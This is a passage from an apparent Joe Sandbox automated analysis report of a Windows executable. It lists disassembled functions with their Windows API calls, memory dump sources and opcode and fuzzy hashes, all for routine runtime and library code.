    • Instruction ID: 155c3b216031d0dc190615dc708e130dba669ecf4e7c648d607c454ee048ccaf
    • Opcode Fuzzy Hash: a7a321c43763ae16b9b2d28c0284f9d27395f88c2c1127b661601dda62ec2d1d
    • Instruction Fuzzy Hash: E3216B71C0421AAFDF15DF98C882AEEB7B4AF45304F0405AEE816B3241E7356A45EB61
    Function 00CBBE48 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetProcAddress.KERNEL32(00000000,00CC4ADC), ref: 00CBBEA8
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    • Opcode ID: 3a07666024ba922749ebc6004a443897b8883d534bae992aa90e024fc7967324
    • Instruction ID: 3b74ea381f2e8b3b52ce0386e43f988cfd47be13c5a7c00b815fdc306300e0f5
    • Opcode Fuzzy Hash: 3a07666024ba922749ebc6004a443897b8883d534bae992aa90e024fc7967324
    • Instruction Fuzzy Hash: C911E7336015649F9B259E2DEC81ADF73A5DB84320F164121FE28EF264D770ED0186D0
    Function 00C98823 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C98828
      • Part of subcall function 00C9E298: __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00CA33D4: __EH_prolog.LIBCMT ref: 00CA33D9
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 9a83d07284e8eb59b07dfb156b6864ff0085f377be416133152bb1e2db506094
    • Instruction ID: 58f25dc9e2b2508e84c698ce4a46a59b289a4f2e3c244edf9a9ad763a7b7ca36
    • Opcode Fuzzy Hash: 9a83d07284e8eb59b07dfb156b6864ff0085f377be416133152bb1e2db506094
    • Instruction Fuzzy Hash: 3C215EB0900744AFD720DFAAC48569BFBF4BF29304F40492EE59E93652D774A604DB91
    Function 00C9E298 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00C96891: __EH_prolog.LIBCMT ref: 00C96896
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: df3c90a9869688a9dc1fa1b5f94892034815a4657b41ee6d1e0624c3fc193a92
    • Instruction ID: 796f8266a49fee68cb93097f04086181810565d15a6a2756396a1d8b0996e543
    • Opcode Fuzzy Hash: df3c90a9869688a9dc1fa1b5f94892034815a4657b41ee6d1e0624c3fc193a92
    • Instruction Fuzzy Hash: DD11A0B0A04294AADF14EBB9D5097AEBAE8AF95300F10446EE446D3382DF749E00D721
    Function 00CAEB92 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00CAEB97
      • Part of subcall function 00CA197C: _wcslen.LIBCMT ref: 00CA1992
      • Part of subcall function 00C98823: __EH_prolog.LIBCMT ref: 00C98828
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog$_wcslen
    • String ID:
    • API String ID: 2838827086-0
    • Opcode ID: d04ee9e4e1dbe9d526f901bfb981d555381f73cade662491d6011d63435ec2e1
    • Instruction ID: 362ca518cc60f460fc1d9f69f6f3c88e76adf344364305477b8466dc0a980e13
    • Opcode Fuzzy Hash: d04ee9e4e1dbe9d526f901bfb981d555381f73cade662491d6011d63435ec2e1
    • Instruction Fuzzy Hash: 401127715052C09ED710EBA8EC56BDD3FB4DB15310F00807EF0555B293DBB10645EB62
    Function 00C96891 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 2ec5d3ada196a4ba64b72293c9ef2e83f6054b18681bc4e7c868e0d2e91eba8a
    • Instruction ID: 6dc1fa06314125b7d62289e5cf5ce8d936af988ad8cad40b02256ac5d504ba8e
    • Opcode Fuzzy Hash: 2ec5d3ada196a4ba64b72293c9ef2e83f6054b18681bc4e7c868e0d2e91eba8a
    • Instruction Fuzzy Hash: AD01A2B0680341ABD620EB25CC06FDB7BECEB84B00F00402EB655A2182D7B02600D655
    Function 00CBA7EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 810b54644482cbd389660ac7b48469c8921c267326b13c6035ffa8b823b0745a
    • Instruction ID: bce845da29ef9b6f44461a5cade7ac8a57e10aff3426f2f1f4f72b720d709fed
    • Opcode Fuzzy Hash: 810b54644482cbd389660ac7b48469c8921c267326b13c6035ffa8b823b0745a
    • Instruction Fuzzy Hash: B7E06D75241221A6EA313666AC05BFF3A8CDF853B0F194121FDE5968D2DB62CD02D5E3
    Function 00C9B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C9BA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BABD
      • Part of subcall function 00C9BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAEB
      • Part of subcall function 00C9BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAF7
    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Find$FileFirst$CloseErrorLast
    • String ID:
    • API String ID: 1464966427-0
    • Opcode ID: 28eec3ce14d18f9f5a13bcedcef396837e3ea0317090f30ef3ceef954d80bfaa
    • Instruction ID: 9cb586d3d6dc8b8a4ebcb8336e866ce9f9f7ba9eeb5ec5de855b6dc5d8137004
    • Opcode Fuzzy Hash: 28eec3ce14d18f9f5a13bcedcef396837e3ea0317090f30ef3ceef954d80bfaa
    • Instruction Fuzzy Hash: BEF0AE32008790BACE2217B4690C7CB7BA05F15335F018A4DF2FD121D2C7746495A721
    Function 00CA2121 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
    Download Yara Rule
    APIs
    • SetThreadExecutionState.KERNEL32(00000001), ref: 00CA2156
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    • Opcode ID: 6da0ae5cc72516dccc8f59c8aa58615b7b47c5209fb2a3e833593d508450acc0
    • Instruction ID: beeec4cab7d584d06253eb90ff0d587ccc3deb500a12eb3e85f367b09d1cb2aa
    • Opcode Fuzzy Hash: 6da0ae5cc72516dccc8f59c8aa58615b7b47c5209fb2a3e833593d508450acc0
    • Instruction Fuzzy Hash: 5AD0125175546152DE26377C68497BD5A465FC3319F0800A7B709562938B540D86B2B2
    Function 00CAB626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
    Download Yara Rule
    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 00CAB62C
      • Part of subcall function 00CAB3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAB3D9
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction ID: 234dfc4dd2be510ef6d00b932fff6fd9a77c6deae0712d27cdb40cfcc5a108a5
    • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction Fuzzy Hash: 5FD0C73061460A7ADF466B618D029BEB9959B12748F008135784195192EFF1DD506651
    Function 00C96920 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C96925
      • Part of subcall function 00CA04E5: __EH_prolog.LIBCMT ref: 00CA04EA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: caba1dc15fb1c753da26ef2fdd7c66f8fb1bb884a66f9eb664deecc2074db90d
    • Instruction ID: e9967ede5ebc63a5ee0cfac8c80b57c0319f8d2f4a12a0dadaa0bd2c11c75592
    • Opcode Fuzzy Hash: caba1dc15fb1c753da26ef2fdd7c66f8fb1bb884a66f9eb664deecc2074db90d
    • Instruction Fuzzy Hash: FFD05E71E104669BCB15AB88D4127AEB274EB05708F00416EF411A3341CBB44A009780
    Function 00CAF737 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • DloadProtectSection.DELAYIMP ref: 00CAF75F
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DloadProtectSection
    • String ID:
    • API String ID: 2203082970-0
    • Opcode ID: 9e67b8f7aa2258c0f96b18a8b4e545213921c2b8256fdf6c38010c3a76151dd2
    • Instruction ID: d48953dd84dfe332573e00eb9353d02b2edf803420fb77d7e72c1ca9a0057876
    • Opcode Fuzzy Hash: 9e67b8f7aa2258c0f96b18a8b4e545213921c2b8256fdf6c38010c3a76151dd2
    • Instruction Fuzzy Hash: 32D0C93051425AAAC251BBB4DD4676D22A0B30A34CB400529F255C1190D7748643D61A
    Function 00CAEEAD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
    Download Yara Rule
    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CA2E78), ref: 00CAEED2
      • Part of subcall function 00CAC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
      • Part of subcall function 00CAC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
      • Part of subcall function 00CAC748: IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
      • Part of subcall function 00CAC748: TranslateMessage.USER32(?), ref: 00CAC78C
      • Part of subcall function 00CAC748: DispatchMessageW.USER32(?), ref: 00CAC796
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
    • String ID:
    • API String ID: 3453300979-0
    • Opcode ID: f23082648d143b978c0e519d76614252e9c898c667a4676a616edf7b5b03f14d
    • Instruction ID: ed07cb1d0b487eee9c13e9cda2915e70064a332241c07458788615586c88964b
    • Opcode Fuzzy Hash: f23082648d143b978c0e519d76614252e9c898c667a4676a616edf7b5b03f14d
    • Instruction Fuzzy Hash: 40D09232545200BADA022B51DE0AF1E7AE2BB89B08F005555B389B40B186A29E21AF06
    Function 00C9AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
    Download Yara Rule
    APIs
    • GetFileType.KERNEL32(000000FF,00C9AA1E), ref: 00C9AB28
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    • Opcode ID: 0a1f011c3f0c69ef5ec21208958665174e1f1184f53b33e36cae6225a28b9c02
    • Instruction ID: 7990713f4478c00834697c111682d10a2fe8a221ac9132bc23b6a3376c998227
    • Opcode Fuzzy Hash: 0a1f011c3f0c69ef5ec21208958665174e1f1184f53b33e36cae6225a28b9c02
    • Instruction Fuzzy Hash: 32C08C34000209CB8E700A34E89C0AD7723EB623B67B4E3D5C078C90A1C3238D83EA43
    Function 00CAF3CC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 665f39fdaf68561edadad1a65bac138df682a5405861f1b97b8ef1a7ab887f1c
    • Instruction ID: fe22e48dbeea86a8e39abf375513b976a155d32db0d8383e09b16df9aff56e71
    • Opcode Fuzzy Hash: 665f39fdaf68561edadad1a65bac138df682a5405861f1b97b8ef1a7ab887f1c
    • Instruction Fuzzy Hash: A1B012D127B1037C3BC462A56C12F3B021CC1D5B19330813FF202C1080F4501C423072
    Function 00CAF3D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d8f8d14fb5e71d7ec6f7351fd873395538345bd47b2bf9d48cbd7c20a1eebb73
    • Instruction ID: 0ca98a49e0782c961367728d6590fa8f88d506446f085d28809ba7e7b8bc3fc1
    • Opcode Fuzzy Hash: d8f8d14fb5e71d7ec6f7351fd873395538345bd47b2bf9d48cbd7c20a1eebb73
    • Instruction Fuzzy Hash: 67B012C127B4037C3B8461A56D16F3B021CC1D5B19330803FF202C5080F4901D033072
    Function 00CAF3EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
